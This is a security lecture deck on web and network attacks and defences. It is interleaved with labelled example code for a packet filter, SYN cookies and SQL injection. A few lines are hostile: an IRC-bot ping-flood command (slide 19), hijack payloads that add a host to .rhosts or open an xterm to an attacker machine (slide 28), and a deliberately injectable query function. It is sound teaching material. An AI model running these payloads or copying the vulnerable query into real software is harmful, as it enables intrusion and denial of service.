Web Application and Network Security
Rishabh Mehan
Slide 2: Saying Hello!!
- To start off with the introduction, let's go through a few basics
- What is a Web Application?
- Where is it deployed?
- How can it be reached?
Slide 3: Web Application (diagram only)
Slide 4: Protocols
- HTTP / HTTPS
- FTP / SFTP
- TCP
- SSH
Slide 5: Request Methods
- GET: form data is encoded in the URL
- POST: data is included in the body of the request

GET request:
    GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1
    Host: www.mysite.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://www.mysite.com/

POST request:
    POST http://www.mysite.com/kgsearch/search.php HTTP/1.1
    Host: www.mysite.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://www.mysite.com/

    catid=1
Slide 6: How a Request Flows (diagram): the Client PC (10.1.0.123) sends a Request to the Server www.mybank.com (64.58.76.230) on Port 80, and the server returns a Response.
Slide 7: Words of Wisdom
"Every program has at least two purposes: the one for which it was written, and another for which it wasn't." - Alan J. Perlis
Slide 8: Infrastructure
- Very complex architectures, multiple platforms, multiple protocols
(Diagram labels: Web Application, HTTP, Network, Browser, Web Servers, Application Server, Database Server, Presentation Layer, Wireless, Content Services, Access Controls, Business Logic, Customer Identification, Media Store, Transaction Information, Core Business Data)
Slide 9: Why Vulnerabilities: The Web Application Security Gap
- Security professionals don't know the applications: "As a Network Security Professional, I don't know how my company's web applications are supposed to work, so I deploy a protective solution… but don't know if it's protecting what it's supposed to."
- Application developers and QA professionals don't know security: "As an Application Developer, I can build great features and functions while meeting deadlines, but I don't know how to develop my web application with security as a feature."
Slide 10: Common Security Attacks and Their Countermeasures
- Finding a way into the network: firewalls
- Exploiting software bugs, buffer overflows: intrusion detection systems
- Denial of service: ingress filtering, IDS
- TCP hijacking: IPSec
- Packet sniffing: encryption (SSH, SSL, HTTPS)
- Social problems: education
Slide 11: Firewalls
- Basic problem: many network applications and protocols have security problems that are fixed over time
- Difficult for users to keep up with changes and keep hosts secure
- Solution
  - Administrators limit access to end hosts by using a firewall
  - The firewall is kept up-to-date by administrators
Slide 12: Firewalls (diagram): Internet -> Firewall -> DMZ (web server, email server, web proxy, etc.) -> Firewall -> Intranet
Slide 13: Firewalls
- What does a firewall rule look like? Depends on the firewall used
- Example: ipfw
    /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet
- Other examples: WinXP and Mac OS X have built-in and third-party firewalls
  - Different graphical user interfaces
  - Varying amounts of complexity and power
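To make the ipfw rule on this slide concrete, here is an added toy first-match packet filter (example code, not ipfw and not from the slides) that reads rules in the slide's syntax and decides a packet's fate. The service-name map, the second rule and the default policy are assumptions; real ipfw resolves host names to addresses when the rule is loaded, whereas this toy compares names as strings.

```python
# Added example, not from the slides: a toy first-match packet filter for
# rules written in the ipfw-like syntax shown on the slide.
SERVICES = {"telnet": 23, "ssh": 22, "http": 80, "https": 443}  # assumed map

def parse_rule(text: str) -> dict:
    """'add deny tcp from cracker.evil.org to wolf.tambov.su telnet' ->
    {'action': 'deny', 'proto': 'tcp', 'src': ..., 'dst': ..., 'dport': 23}"""
    tokens = text.replace("/sbin/ipfw", "").split()
    if tokens[0] != "add" or tokens[3] != "from" or tokens[5] != "to":
        raise ValueError(f"unsupported rule syntax: {text!r}")
    rule = {"action": tokens[1], "proto": tokens[2],
            "src": tokens[4], "dst": tokens[6], "dport": None}
    if len(tokens) > 7:  # optional destination port, by name or number
        port = tokens[7]
        rule["dport"] = SERVICES[port] if port in SERVICES else int(port)
    return rule

def matches(rule: dict, pkt: dict) -> bool:
    """A rule matches when every field it constrains agrees with the packet."""
    if rule["proto"] not in ("ip", pkt["proto"]):
        return False
    if rule["src"] not in ("any", pkt["src"]):
        return False
    if rule["dst"] not in ("any", pkt["dst"]):
        return False
    if rule["dport"] is not None and rule["dport"] != pkt.get("dport"):
        return False
    return True

def filter_packet(rules: list, pkt: dict, default: str = "allow") -> str:
    """First matching rule wins, as in ipfw; otherwise the default policy
    applies (the default here is an assumption for the example)."""
    for rule in rules:
        if matches(rule, pkt):
            return rule["action"]
    return default

# The slide's rule, followed by a constructed allow rule for SSH.
RULES = [
    parse_rule("/sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet"),
    parse_rule("add allow tcp from any to wolf.tambov.su ssh"),
]
```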
Slide 14: Denial of Service
- Purpose: make a network service unusable, usually by overloading the server or network
- Many different kinds of DoS attacks
  - SYN flooding
  - SMURF
  - Distributed attacks
Slide 15: Denial of Service
- SYN flooding attack: send SYN packets with a bogus source address
- Why? The server responds with SYN-ACK and keeps state about the TCP half-open connection; eventually, server memory is exhausted with this state
- Solution: use "SYN cookies"
  - In response to a SYN, create a special "cookie" for the connection, and forget everything else
  - Then recreate the forgotten information when the ACK comes in from a legitimate connection
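The SYN-cookie idea on this slide, as an added simplified implementation (not the slides' code and not a real TCP stack): the server's ISN is a keyed hash of the connection 4-tuple plus a coarse time counter, so nothing is stored for a half-open connection, and the final ACK is verified by recomputing the cookie. Real stacks also pack an MSS index into the ISN and use a finer time source; the key, counter width and maximum age here are assumptions, and the addresses are the slide's.

```python
# Added example, not from the slides: a simplified SYN cookie. The cookie is a
# keyed hash of the 4-tuple plus a coarse time counter, and the server verifies
# the client's final ACK without having stored any per-connection state.
import hashlib
import hmac
import secrets

SECRET = secrets.token_bytes(16)  # per-server key; rotated periodically in practice
COUNTER_BITS = 5                  # low bits of the ISN carry the time counter
COUNTER_MASK = (1 << COUNTER_BITS) - 1

def _keyed_hash(src_ip, src_port, dst_ip, dst_port, counter) -> int:
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}|{counter}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big")

def make_syn_cookie(src_ip, src_port, dst_ip, dst_port, counter) -> int:
    """ISN to send in the SYN-ACK; nothing else about the SYN is remembered."""
    counter &= COUNTER_MASK
    h = _keyed_hash(src_ip, src_port, dst_ip, dst_port, counter)
    return ((h & ~COUNTER_MASK) | counter) & 0xFFFFFFFF

def check_syn_cookie(src_ip, src_port, dst_ip, dst_port, ack_num, now_counter,
                     max_age=3) -> bool:
    """On the final ACK, recover the cookie (ack - 1), reject stale ones, and
    recompute it for this 4-tuple; only a cookie we issued recently passes."""
    cookie = (ack_num - 1) & 0xFFFFFFFF
    counter = cookie & COUNTER_MASK
    age = (now_counter - counter) & COUNTER_MASK
    if age > max_age:
        return False
    return make_syn_cookie(src_ip, src_port, dst_ip, dst_port, counter) == cookie

if __name__ == "__main__":
    # Constructed handshake using the slide's client and server addresses.
    isn = make_syn_cookie("10.1.0.123", 40000, "64.58.76.230", 80, counter=7)
    print(check_syn_cookie("10.1.0.123", 40000, "64.58.76.230", 80, isn + 1, 8))
```

A SYN from a bogus source never produces a valid ACK, so the server spends a hash computation per SYN instead of a memory allocation.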
Slide 16: Denial of Service (diagram only)
Slide 17: Denial of Service
- SMURF
  - The source IP address of a broadcast ping is forged
  - A large number of machines respond back to the victim, overloading it
Slide 18: Denial of Service (SMURF diagram): the perpetrator sends an ICMP echo with the spoofed source address of the victim to an IP broadcast address; every host on that network sends an ICMP echo reply across the Internet to the victim.
Slide 19: Denial of Service
- Distributed Denial of Service: same techniques as regular DoS, but on a much larger scale
- Example: Sub7Server Trojan and IRC bots
  - Infect a large number of machines with a "zombie" program
  - The zombie program logs into an IRC channel and awaits commands
  - Example:
    - Bot command: !p4 207.71.92.193
    - Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000
    - Sends 10,000 64k packets to the host (655MB!)
- Read more at: http://grc.com/dos/grcdos.htm
Slide 20: TCP Attacks
- Recall how IP works: end hosts create IP packets and routers process them purely based on the destination address alone
- Problem: end hosts may lie about other fields which do not affect delivery
  - Source address: a host may trick the destination into believing that the packet is from a trusted source
  - Especially applications which use IP addresses as a simple authentication method
- Solution: use better authentication methods
Slide 21: TCP Attacks
- TCP connections have associated state: starting sequence numbers, port numbers
- Problem: what if an attacker learns these values?
  - Port numbers are sometimes well known to begin with (e.g. HTTP uses port 80)
  - Sequence numbers are sometimes chosen in very predictable ways
Slide 22: TCP Attacks
- If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!
- The attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source
- Example: instead of downloading and running a new program, you download a virus and execute it
Slide 23: TCP Attacks
- Say hello to Alice, Bob and Mr. Big Ears
Slide 24: TCP Attacks
- Alice and Bob have an established TCP connection
Slide 25: TCP Attacks
- Mr. Big Ears lies on the path between Alice and Bob on the network
- He can intercept all of their packets
Slide 26: TCP Attacks
- First, Mr. Big Ears must drop all of Alice's packets since they must not be delivered to Bob (why?)
(Diagram: Alice's packets go into "The Void")
Slide 27: TCP Attacks
- Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network)
(Diagram label: ISN, SRC=Alice)
Slide 28: TCP Attacks
- What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?
  - Can just DoS Alice instead of dropping her packets
  - Can just send guesses of what the ISN is until it is accepted
- How do you know when the ISN is accepted?
  - Mitnick: payload is "add self to .rhosts"
  - Or, "xterm -display MrBigEars:0"
Slide 29: TCP Attacks
- Why are these types of TCP attacks so dangerous?
(Diagram: web server, trusting web client, malicious user)
Slide 30: TCP Attacks
- How do we prevent this? IPSec
  - Provides source authentication, so Mr. Big Ears cannot pretend to be Alice
  - Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is
Slide 31: Packet Sniffing
- Recall how Ethernet works…
  - When someone wants to send a packet to someone else…
  - They put the bits on the wire with the destination MAC address…
  - And remember that other hosts are listening on the wire to detect collisions…
- It couldn't get any easier to figure out what data is being transmitted over the network!
Slide 32: Packet Sniffing
- How can we protect ourselves?
- SSH, not Telnet
  - Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!)
  - Now that I have told you this, please do not exploit this information
  - Packet sniffing is, by the way, prohibited by Computing Services
- HTTP over SSL
  - Especially when making purchases with credit cards!
- SFTP, not FTP
  - Unless you really don't care about the password or data
  - Can also use KerbFTP (download from MyAndrew)
- IPSec
  - Provides network-layer confidentiality
Slide 33: Web Application Vulnerabilities
Web application vulnerabilities occur in multiple areas (grouped as on slides 35 to 37):
- Platform: Known Vulnerabilities
- Administration: Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing
- Application: Application Mapping, Custom Application Scripting, Parameter Manipulation, Reverse Directory Traversal, Cookie Manipulation, Cookie Poisoning/Theft, Brute Force, Buffer Overflow, SQL Injection, Cross-site Scripting
Slide 34: What the #@$& is happening???
(Bar chart with percentages on the axis from 0 to 50, one bar per category: Info Disclosure, File Include, Input Validation, Auth, SQL Injection, XSS; the only legible data label is "Info Disclosure, 3")
Slide 35: Web Application Vulnerabilities: Platform
- Known vulnerabilities can be exploited immediately with a minimum amount of skill or experience ("script kiddies")
- Most easily defendable of all web vulnerabilities
- MUST have streamlined patching procedures
Slide 36: Web Application Vulnerabilities: Administration
- Categories: Extension Checking, Common File Checks, Data Extension Checking, Backup Checking, Directory Enumeration, Path Truncation, Hidden Web Paths, Forceful Browsing
- Less easily corrected than known issues
- Require increased awareness
- More than just configuration: must be aware of security flaws in actual content
- Remnant files can reveal applications and versions in use
- Backup files can reveal source code and database connection strings
Slide 37: Web Application Vulnerabilities: Application Programming
- Categories: Application Mapping, Cookie Manipulation, Custom Application Scripting, Parameter Manipulation, Reverse Directory Traversal, Brute Force, Cookie Poisoning/Theft, Buffer Overflow, SQL Injection, Cross-site Scripting
- Common coding techniques do not necessarily include security
- Input is assumed to be valid, but not tested
- Unexamined input from a browser can inject scripts into a page for replay against later visitors
- Unhandled error messages reveal application and database structures
- Unchecked database calls can be "piggybacked" with a hacker's own database call, giving direct access to business data through a web browser
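The last three bullets in code, as an added example (not from the slides): an unchecked database call built from the catid parameter of slide 5 beside its parameterized fix, and the output encoding that stops injected script from replaying against later visitors. The SQLite table and rows are constructed for the example.

```python
# Added example, not from the slides: "input assumed valid but not tested" and
# a "piggybacked" database call, shown beside the validated, parameterized fix
# and the output encoding that keeps stored input from running as script.
import html
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed catalogue: one public row and one that should never leak."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (catid INTEGER, name TEXT, visibility TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)",
                   [(1, "Widget", "public"), (2, "Internal SKU", "confidential")])
    return db

def search_vulnerable(db: sqlite3.Connection, catid: str) -> list:
    """Input spliced into the SQL text: the caller's string decides the query's
    shape, so a crafted value piggybacks its own condition onto ours."""
    sql = f"SELECT name FROM products WHERE catid = {catid}"
    return [row[0] for row in db.execute(sql)]

def search_safe(db: sqlite3.Connection, catid: str) -> list:
    """Validate first, then bind: the value is only ever data, never SQL."""
    if not catid.isdigit():
        raise ValueError("catid must be numeric")
    rows = db.execute("SELECT name FROM products WHERE catid = ?", (int(catid),))
    return [row[0] for row in rows]

def render_name(name: str) -> str:
    """Output encoding: whatever reached the database is rendered as text, so a
    stored <script> tag is shown to later visitors, not executed by them."""
    return f"<li>{html.escape(name)}</li>"
```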
Slide 38: Examples
- http://demo.testfire.net/
- http://chat.wallhood.com/moving/moving/images/
Slide 39: How to Secure Web Applications
- Incorporate security into the lifecycle
- Apply information security principles to all software development efforts
- Educate: issue awareness, training, etc.
Slide 40: Are We Still Secure?
LOL NO
Slide 41: Questions?
